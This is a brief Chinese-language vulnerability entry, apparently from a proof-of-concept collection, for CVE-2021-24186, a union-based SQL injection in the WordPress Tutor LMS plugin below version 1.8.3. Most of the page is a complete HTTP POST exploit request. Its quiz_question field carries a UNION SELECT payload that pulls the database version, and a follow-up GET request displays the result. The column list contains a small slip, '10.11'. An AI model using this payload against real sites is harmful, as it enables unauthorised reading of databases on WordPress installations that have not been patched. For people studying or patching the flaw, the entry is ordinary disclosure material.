# WordPress插件Tutor LMS SQL注入漏洞（CVE-2021-24186）

Tutor LMS – eLearning and online course solution是WordPress的一个插件，可以创建具有挑战性和趣味性的测验，互动课程，功能强大的报告和统计信息。Tutor LMS – eLearning and online course solution < 1.8.3 的 tutor_answering_quiz_question/get_answer_by_id两个函数对student字段处理不当，导致了基于联合查询的SQL注入漏洞。

影响版本：

Tutor LMS – eLearning and online course solution < 1.8.3

PoC：

```
POST /courses/first-class/tutor_quiz/test/ HTTP/1.1
Host: [URL]
Content-Length: 413
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: [URL]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: [URL]
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [COOKIES]
Connection: close

_wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit
Then send a GET request to

http://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1
```

ref:

* https://nvd.nist.gov/vuln/detail/CVE-2021-24186
* https://mp.weixin.qq.com/s/WdaOrEf7l7H0URhDyXjPpw
* https://wpscan.com/vulnerability/5f5c0c6c-6f76-4366-b590-0aab557f8c60